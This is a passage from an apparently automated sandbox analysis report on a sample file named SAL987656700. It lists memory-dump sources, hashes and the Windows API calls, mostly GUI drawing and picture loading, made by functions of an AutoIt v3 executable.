                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                      • String ID:
                                      • API String ID: 2797419724-0
                                      • Opcode ID: 2c21eebffee8a28c435b6525e9a543c318bf786916f3cae3f6f23f586dcea2c5
                                      • Instruction ID: 03d4265f85c4286fb4baa0bbb4b1a04c6ca48eab23479ea69cfb9a3dcac88bb7
                                      • Opcode Fuzzy Hash: 2c21eebffee8a28c435b6525e9a543c318bf786916f3cae3f6f23f586dcea2c5
                                      • Instruction Fuzzy Hash: F1D01270284308B7EE203B69DC07F893A59EB017B1F448020FB04791D1CA7264909559
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008A03EE), ref: 008A09DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: b9cb87468f80ffd98bdea4ceaa14172e8ea88953198c333f633ef5cf546fba6f
                                      • Instruction ID: 7b4cbc3b75499490a1633b5e314d2856eb6201e57fd573c8ba96f1a12b8889ba
                                      • Opcode Fuzzy Hash: b9cb87468f80ffd98bdea4ceaa14172e8ea88953198c333f633ef5cf546fba6f
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction ID: 81c3914124f3689a1cd5c961231cf76d52588c0120a76c7cd5753cf3bccd0432
                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction Fuzzy Hash: 7C51466160C6499AFB3845288C597BF2B89FB13344F1C053AD886D7E82D61DEE05F35A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ad6e06dad22bc8433dbde365ef9fbb82652a5d13982100ba1e57c9d26e55c89
                                      • Instruction ID: 362aae3a1b1e9d3a883b259925498dac4aca68c145e5b5034025058896c4b0cd
                                      • Opcode Fuzzy Hash: 1ad6e06dad22bc8433dbde365ef9fbb82652a5d13982100ba1e57c9d26e55c89
                                      • Instruction Fuzzy Hash: A032F022D2DF414DD7339634D822336A689EFB73C5F15D737E82AB5AA9EB29C4835100
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f43b193208dbb2f2474ea7edbe8feeff20be08bb5a8476204d5651af5e112c1c
                                      • Instruction ID: e9b2ee5668a253a807393cd0971e09b3956184bc3b79e79b9834254ae3aa0bf3
                                      • Opcode Fuzzy Hash: f43b193208dbb2f2474ea7edbe8feeff20be08bb5a8476204d5651af5e112c1c
                                      • Instruction Fuzzy Hash: EC322531A4411B8BDF28CF69C890A7D7BA1FF45318F28866BD84ACB391D631DD81DB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62ace0a92a36a3f681933ad6fe30ee27278d042354a35281f6476e00e387ddad
                                      • Instruction ID: 24d211e9db6e18f09b2dd74599abcf8173b50558574433e4527a974e45ead8b2
                                      • Opcode Fuzzy Hash: 62ace0a92a36a3f681933ad6fe30ee27278d042354a35281f6476e00e387ddad
                                      • Instruction Fuzzy Hash: 6422BFB0A046099FDF14DFA8C881BAEB7B6FF44314F244529E816EB291EB35E950CB51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c63d7f948f3412cd7ffa06bbeac19e171e36b45e93ba914db8d6bba91fc7350
                                      • Instruction ID: 14ab3ff0acb6b9947687cc10bfd00a6475adf30c0ada9dd5a07d66269539089a
                                      • Opcode Fuzzy Hash: 0c63d7f948f3412cd7ffa06bbeac19e171e36b45e93ba914db8d6bba91fc7350
                                      • Instruction Fuzzy Hash: B902A5B0A10119EFDF04EF58D841BADB7B1FF54304F548169E956DB291EB31EA10CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                      • Instruction ID: ae5962273a0b904434c067ec9ceb4b065f4128a0ba1b0b764cf78f2123346ec3
                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                      • Instruction Fuzzy Hash: CD9157726080A34AFF294639857C07EFFE1EA533B1B1A079DD4F2CA9C5FE149964D620
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                      • Instruction ID: 30fe702218617d97083cfcde397077e1a2001302d1b723af58e8192ca0187390
                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                      • Instruction Fuzzy Hash: 779141722090B24AFF69427A857C03EFEE1AA933B1B1A079DD4F2CA9C1FD249555D620
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a7892532af15caca31ef041a54b4f83b39d001fd6d73e952c4be8b5deccec73
                                      • Instruction ID: de5be2a59c1193cdf95df14f9578d2665eedb9de94734de4bf3df0e255af5de2
                                      • Opcode Fuzzy Hash: 1a7892532af15caca31ef041a54b4f83b39d001fd6d73e952c4be8b5deccec73
                                      • Instruction Fuzzy Hash: 1C6179B1208719A6FB349A2C8C95BBF2394FF43364F140919E942DBE81D611AE43F376
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9685fdeda11f3aef6026e587c2618ace5c8137fea7f7f310603652035fefaa5e
                                      • Instruction ID: db08d3dc2dc4613a323ae0bcba98ca490c9e980cea595eea1157f37dd1b81a46
                                      • Opcode Fuzzy Hash: 9685fdeda11f3aef6026e587c2618ace5c8137fea7f7f310603652035fefaa5e
                                      • Instruction Fuzzy Hash: 3C618A7160870996FF384A2C4C65BBF2384FF43B04F140959E943CBE89EA56AD42B366
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                      • Instruction ID: 85791e1b5ef6e88849410596f321b1903b709e447f435c18460483bc379b696a
                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                      • Instruction Fuzzy Hash: E58153726090A309FF6D4239857843EFFE1FA933A1B1E17ADD4F2CA9C5EE148554D620
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: a73e04a0ce23376653da9ad54bbdda9837b46a678e2b57d0ed1858c288a2d042
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: 8241D271D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f3693c815779cec3a33c8d6278170fe4fdc6740a9881a085fa94f623fabe5e20
                                      • Instruction ID: fc54de8ef03b78f3b3e8c164f270985dc5d4efe624fe4e53b6df95d29f729943
                                      • Opcode Fuzzy Hash: f3693c815779cec3a33c8d6278170fe4fdc6740a9881a085fa94f623fabe5e20
                                      • Instruction Fuzzy Hash: FF21A8326216158BDB28CF79C81267A73E5F7A4310F15862EE4A7C37D0DE35A904DB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: e77b162469a7451a7301c3ad558c58314db8cafcb1e5dac9f32e878ac06b19d0
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: 0E019278A01209EFCB45DF98C5909AEF7F6FB48314F20859AD809A7701D730AE81DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: 62d134a420a55e05882421f00421d9554e0efdd3308a167ee36c9111bdb613e1
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: DB01A479A10209EFCB45DF98C5909AEF7F6FF48314F20859AD809A7701D730AE81DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00902B30
                                      • DeleteObject.GDI32(00000000), ref: 00902B43
                                      • DestroyWindow.USER32 ref: 00902B52
                                      • GetDesktopWindow.USER32 ref: 00902B6D
                                      • GetWindowRect.USER32(00000000), ref: 00902B74
                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00902CA3
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00902CB1
                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902CF8
                                      • GetClientRect.USER32(00000000,?), ref: 00902D04
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00902D40
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D62
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D75
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D80
                                      • GlobalLock.KERNEL32(00000000), ref: 00902D89
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D98
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00902DA1
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902DA8
                                      • GlobalFree.KERNEL32(00000000), ref: 00902DB3
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00902DC5
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0091FC38,00000000), ref: 00902DDB
                                      • GlobalFree.KERNEL32(00000000), ref: 00902DEB
                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00902E11
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00902E30
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902E52
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0090303F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: 56627ab82b6e6682045d3bad4bb01a1ec704fed04b27aa16696485bf4e7b98e9
                                      • Instruction ID: 3a92252f3d114f5c7247408f115c7660afd44d09157ca8f07a364ba2acdeaf20
                                      • Opcode Fuzzy Hash: 56627ab82b6e6682045d3bad4bb01a1ec704fed04b27aa16696485bf4e7b98e9
                                      • Instruction Fuzzy Hash: B9028DB1610215AFDB14DF68CC89EAE7BB9FF49711F108558F915AB2A1C770ED00DB60
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0091712F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00917160
                                      • GetSysColor.USER32(0000000F), ref: 0091716C
                                      • SetBkColor.GDI32(?,000000FF), ref: 00917186
                                      • SelectObject.GDI32(?,?), ref: 00917195
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 009171C0
                                      • GetSysColor.USER32(00000010), ref: 009171C8
                                      • CreateSolidBrush.GDI32(00000000), ref: 009171CF
                                      • FrameRect.USER32(?,?,00000000), ref: 009171DE
                                      • DeleteObject.GDI32(00000000), ref: 009171E5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00917230
                                      • FillRect.USER32(?,?,?), ref: 00917262
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00917284
                                        • Part of subcall function 009173E8: GetSysColor.USER32(00000012), ref: 00917421
                                        • Part of subcall function 009173E8: SetTextColor.GDI32(?,?), ref: 00917425
                                        • Part of subcall function 009173E8: GetSysColorBrush.USER32(0000000F), ref: 0091743B
                                        • Part of subcall function 009173E8: GetSysColor.USER32(0000000F), ref: 00917446
                                        • Part of subcall function 009173E8: GetSysColor.USER32(00000011), ref: 00917463
                                        • Part of subcall function 009173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00917471
                                        • Part of subcall function 009173E8: SelectObject.GDI32(?,00000000), ref: 00917482
                                        • Part of subcall function 009173E8: SetBkColor.GDI32(?,00000000), ref: 0091748B
                                        • Part of subcall function 009173E8: SelectObject.GDI32(?,?), ref: 00917498
                                        • Part of subcall function 009173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009174B7
                                        • Part of subcall function 009173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009174CE
                                        • Part of subcall function 009173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009174DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: 4b4f97fd49c66a320efccdbeb4d37e35a8d255f1c95ec937c222c9cf30d47c30
                                      • Instruction ID: c62c3c4f4660d8021658ceeb6f693491c985f686c2d7210ea60af0ff29e98433
